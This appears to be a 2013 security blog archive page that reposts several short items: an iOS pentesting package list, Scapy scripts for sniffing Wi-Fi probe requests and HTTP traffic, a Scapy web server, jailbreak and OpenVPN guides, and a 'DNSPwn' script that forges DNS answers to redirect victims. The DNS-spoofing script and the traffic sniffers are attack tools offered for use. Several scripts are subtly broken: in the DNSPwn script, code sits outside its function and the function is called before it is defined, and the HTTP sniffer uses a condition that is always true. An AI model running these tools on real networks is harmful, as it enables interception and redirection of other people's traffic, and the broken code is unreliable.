Dec 28, 2013

Creating a iOS7 Application Pentesting Environment

List of program that should install after jailbreak. SSH to iPhone and apt-get install this program list


adv-cmds
apr
apr-lib
apr-util
apt
apt7
apt7-key
apt7-lib
apt7-ssl
base
bash
basic-cmds
berkeleydb
bigbosshackertools
bootstrap-cmds
bzip2
class-dump
com.ericasadun.utilities
com.evad3rs.evasi0n7
com.innoying.sbutils
coreutils
coreutils-bin
curl
cy+cpu.arm
cy+kernel.darwin
cy+lib.corefoundation
cy+model.ipad
cy+os.ios
cydia
cydia-lproj
darwintools
debianutils
developer-cmds
diffutils
diskdev-cmds
dpkg
expat
file
file-cmds
findutils
firmware
firmware-sbin
gawk
gdb
gettext
git
gnupg
grep
gzip
inetutils
iokittools
ldid
less
libffi
libxml2
libxml2-lib
lsof
lzma
make
nano
ncurses
neon
network-cmds
odcctools
openssh
openssl
org.thebigboss.repo.icons
p7zip
pam
pam-modules
patch
pcre
profile.d
python
readline
rsync
sed
shell-cmds
sqlite3
sqlite3-lib
subversion
system-cmds
tar
tcpdump
top
uikittools
unrar
unzip
uuid
vim
wget
whois
xar
xml2
zip



Source:  http://carnal0wnage.attackresearch.com/2013/12/creating-ios7-application-pentesting.html



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 27, 2013

Howto: Finding Hidden AP With Scapy

#!/usr/bin/env python

from scapy.all import *

#wlan.fc.type == 0           Management frames
#wlan.fc.type == 1           Control frames
#wlan.fc.type == 2           Data frames
#wlan.fc.type_subtype == 0   Association request
#wlan.fc.type_subtype == 1   Association response
#wlan.fc.type_subtype == 2   Reassociation request
#wlan.fc.type_subtype == 3   Reassociation response
#wlan.fc.type_subtype == 4   Probe request
#wlan.fc.type_subtype == 5   Probe response
#wlan.fc.type_subtype == 8   Beacon

m_face='mon0'

aps=[]
f=dict()

def find_ssid(probe):
        if probe.haslayer(Dot11):
        #if (probe.subtype == 8L or probe.subtype == 5L) and probe.type == 0L:
                if probe.type == 0 and probe.subtype == 8 and (probe.haslayer(Dot11Beacon) or probe.haslayer(Dot11ProbeResp)):
                        if probe.addr2 not in aps:
                                aps.append(probe.addr2)
                                print("BSSID: "+probe.addr2+", SSID: "+probe.info)

sniff(iface=m_face,prn=find_ssid)




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Wireless Client List With Scapy

#!/usr/bin/env python 
import sys

from scapy.all import *

PROBE_REQ_TYPE = 0
PROBE_REQ_SUBTYPE = 4

unique_ssids = []

def PacketHandler(pkt):

    if pkt.haslayer(Dot11):
        # check if Beacon frame
        if pkt.type == PROBE_REQ_TYPE and pkt.subtype == PROBE_REQ_SUBTYPE :
            # null probe removal 
            if pkt.info not in unique_ssids:
                unique_ssids.append(pkt.info)

                print "New probed SSID: %s" % ( pkt.info)


sniff(iface=sys.argv[1], count=int(sys.argv[2]), prn=PacketHandler)
 
Source: http://forums.securitytube.net/t/wi-fi-client-probe-sniffer-with-scapy/63 




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 25, 2013

Videos: DefCon 21(2013)

Video List Of DefCon 21 Conference 2013

https://www.youtube.com/playlist?list=PL9fPq3eQfaaBD_8E9PJ8yyiTL0JhynlGK


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Install Openvpn On Raspberry-Pi(Raspbian)

Requirements

Raspbian or a similar distribution.

Step 1

To be able to install the latest programversions we should update our packet sources:

Step 2

Now we are installing OpenVPN and OpenSSL.

Step 3

We are switching to the directory of OpenVPN and paste a directory we will be needing later into it.

Step 4

Now we open the file easy-rsa/vars with nano and apply some changes.

Step 5

We change the directory, log in as root user and execute some configurations.

Step 6

Now we are able to generate the components for the encryption of OpenVPN. After the first input you will be asked for the abbreviation of your country (US = USA, DE – Germany, AT = Austria, CH – Switzerland). All other inputs can simply be confirmed.

Step 7

The calculation of the last components can take a few minutes.

Step 8

We have to switch the directory again and create the file openvpn.conf with the following content:
You can change the DNS-servers to any DNS you like.

Step 9

Now, create the internet-forwarding for the CPN clients. If you are not using an ethernet-cable (e.g. Wifi) you will have to replace “eth0″ with the name of your network device.

Step 10

One of the final steps will be to delete the “#” before net.ipv4.ip_forward=1 in sysctl.conf.

Step 11

A part of the above settings have to be endorsed as a crontab to work permanently. Insert following line at the end of the crontab file (replace “eth0″ if you did above):

Step 12

Again change to the root-user and to the directory /etc/openvpn/easy-rsa/keys in which we will create the fileraspberrypi.ovpn and fill it with the code of the second paragraph. RASPBERRY-PI-IP should be replaced by the IP address of your Pi or, if you are using a DynDNS service,  by the given domain.

Step 13

Now create a packet with all the needed files for the client, which we will place in /home/pi and give the user pi the needed rights to the file.

Step 14

Restart the OpenVPN server.
1
sudo /etc/init.d/openvpn start



Source:  http://www.n0where.net/openvpn-raspberry-pi/



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 24, 2013

DNSPwn Attack

from scapy.all import *

sniff(prn=lambda x: send_response(x),
  lfilter=lambda x:x.haslayer(UDP) and x.dport == 53)
 
def send_response(x):
  # Get the requested domain
  req_domain = x[DNS].qd.qname
  spoofed_ip = '192.168.2.1'
  # Let's build our response from a copy of the original packet
  response = x.copy()
  # We need to start by changing our response to be "from-ds", or from the access point.
  response.FCfield = 2L
  # Switch the MAC addresses
  response.addr1, response.addr2 = x.addr2, x.addr1
  # Switch the IP addresses
  response.src, response.dst = x.dst, x.src
  # Switch the ports
  response.sport, response.dport = x.dport, x.sport
  # Set the DNS flags
  response[DNS].qr = 1L
  response[DNS].ra = 1L
  response[DNS].ancount = 1
 
response[DNS].an = DNSRR(
  rrname = req_domain,
  type = 'A',
  rclass = 'IN',
  ttl = 900,
  rdata = spoofed_ip
  )
 
sendp(response)
 
 
Source: http://jordan-wright.github.io/blog/2013/11/15/wireless-attacks-with-python-part-one-the-airpwn-attack/    


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Build Web Server With Scapy

#!/usr/bin/python
from scapy.all import *
   
 
## The script waits for an incoming connection that concerns our IP address, i.e. 192.168.1.1. It is possible to specify multiple IP addresses on Linux, that’s why it might be intelligent to check for the correct IP address as seen below. We also filter for TCP traffic. We are not concerned about other protocols.
# Wait for the SYN of the client
a=sniff(count=1,filter="tcp and host 192.168.1.1 and port 80")

# Initializing some variables for later use.
ValueOfPort=a[0].sport
SeqNr=a[0].seq
AckNr=a[0].seq+1 # We are Syn-Acking, so this must be +1
 
#### Note that on Linux, Sequence numbers are relative, not absolute.
As we received the connecting SYN request of the client, we need to answer with a correct SYN-ACK to finish our part of the TCP diplomacy:
# Generating the IP layer:
ip=IP(src="192.168.1.1", dst="192.168.1.2")

# Generating TCP layer: src port 80, dest port of client, 
# flags SA means "Syn-Ack", the AckNr ist +1, and the MSS shall be a default 1460.
TCP_SYNACK=TCP(sport=80, dport=ValueOfPort, flags="SA", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)])

#send SYNACK to remote host AND receive ACK
ANSWER=sr1(ip/TCP_SYNACK)
 
# Capture next TCP packets with dport 80. (contains http GET request)
GEThttp = sniff(filter="tcp and port 80",count=1,prn=lambda x:x.sprintf("{IP:%IP.src%: %TCP.dport%}"))

# Updating the sequence number as well as the Ack number
AckNr=AckNr+len(GEThttp[0].load)
SeqNr=a[0].seq+1 

# Print the GET request of the client (contains browser data and similar data).
# (Sanity check: size of data should be greater than 1.)
if len(GEThttp[0].load)>1: print GEThttp[0].load

# Generate custom http file content.
html1="HTTP/1.1 200 OK\x0d\x0aDate: Wed, 29 Sep 2010 20:19:05 GMT\x0d\x0aServer: Testserver\x0d\x0aConnection: Keep-Alive\x0d\x0aContent-Type: text/html; charset=UTF-8\x0d\x0aContent-Length: 291\x0d\x0a\x0d\x0a<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\"><html><head><title>Testserver</title></head><body bgcolor=\"black\" text=\"white\" link=\"blue\" vlink=\"purple\" alink=\"red\"><p><font face=\"Courier\" color=\"blue\">-Welcome to test server-------------------------------</font></p></body></html>"

# Generate TCP layer
data1=TCP(sport=80, dport=ValueOfPort, flags="PA", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)])

# Construct whole network packet, send it and fetch the returning ack.
ackdata1=sr1(ip/data1/html1)
# Store new sequence number.
SeqNr=ackdata1.ack
 
 
# Generate RST-ACK packet
Bye=TCP(sport=80, dport=ValueOfPort, flags="RA", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)])

send(ip/Bye)

# the end.
  
 
### Other than the sr-function above, ‘send‘ just sends the data and doesn’t capture the answer. It is the right choice when the answer is irrelevant (which is the case here).
 

Source: http://akaljed.wordpress.com/2010/12/12/scapy-as-webserver/






If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 22, 2013

Howto: Jailbreak iPhone 5S,5,5C, iPad, iPod Touch(By Evasi0n7)

Jailbreak 7, 7.0.3, 7.0.4 untethered for iPhone 5s, 5c, 5, iPad and iPod touch (Guide)

Jailbreak iOS 7 with evasi0n7 untethered guide! So we're really surprised with the new this morning about the iOS 7.x jailbreak released by evad3rs team. Evasi0n7 gives you the ability to jailbreak your iOS 7.x device in few minutes. Below is a full step-by-step guide to show you the whole jailbreak process!



STEP 1: Download Evasi0n7 for Mac OS X/Windows.

STEP 2: Download your iOS 7.x.x from our download page.

STEP 3: Make sure to backup all your data on your iPhone using iTunes or iCloud before using Evasi0n7 untethered jailbreak.

STEP 4: Launch Evasi0n7 and plug in your device to the computer then click on "Jailbreak" button.
STEP 5: Now Evasi0n7 will start the jailbreak process, so sit back and enjoy.
STEP 6: Evasi0n7 will reboot your device.

STEP 7: After done, an app of Evasi0n7 will appear on your iPhone's homescreen. Tap on it.


STEP 8: Your device will be rebooted again.

STEP 9: Evasi0n7 will continue processing your jailbreak and will reboot your iPhone for several times until the jailbreak is done.

STEP 8: Hola ! Cydia is here and you are ready to go..




Source: http://www.redsn0w.us/2013/12/jailbreak-7-703-704-untethered-for.html



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Simple Sniffer HTTP Request and HTTP Response with Python Scapy

You must download Scapy-HTTP before test this code.

#!/usr/bin/env python

from scapy.all import *
from scapy.error import Scapy_Exception
import HTTP

m_iface="wlan0"
count=0

def pktTCP(pkt):
    global count
    count=count+1
    if HTTP.HTTPRequest or HTTP.HTTPResponse in pkt:
        src=pkt[IP].src
        srcport=pkt[IP].sport
        dst=pkt[IP].dst
        dstport=pkt[IP].dport
        test=pkt[TCP].payload
        if HTTP.HTTPRequest in pkt:
            print "HTTP Request:"
            print test

            print "======================================================================"

        if HTTP.HTTPResponse in pkt:
            print "HTTP Response:"
            print test
            print "======================================================================"
     
sniff(filter='tcp and port 80',iface=m_iface,prn=pktTCP)


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |